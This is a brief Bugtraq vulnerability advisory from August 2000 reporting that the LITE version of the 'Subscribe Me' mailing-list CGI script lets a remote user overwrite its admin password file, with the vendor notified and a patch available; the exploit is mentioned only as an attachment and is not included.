Date:         Wed, 23 Aug 2000 19:06:29 -0700
From: n30 <n30@ALLDAS.DE>
Subject:      Subscribe Me Vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Product: Subscribe Me
Versions: ALL version numbers LITE only
OS: Unix and WinNT
Vendor: Notified, http://www.cgiscriptcenter.com/

The Problem:

    Yet again the script allows a remote user to overwrite the Admin Passwd file with
any password they see fit, therefore giving them Admin access to the Maillist Script.

Exploit:

    See the .zip file attached.

Patches:

    Already available; see website. The download version is patched.

n30
n30@alldas.de
www.alldas.de




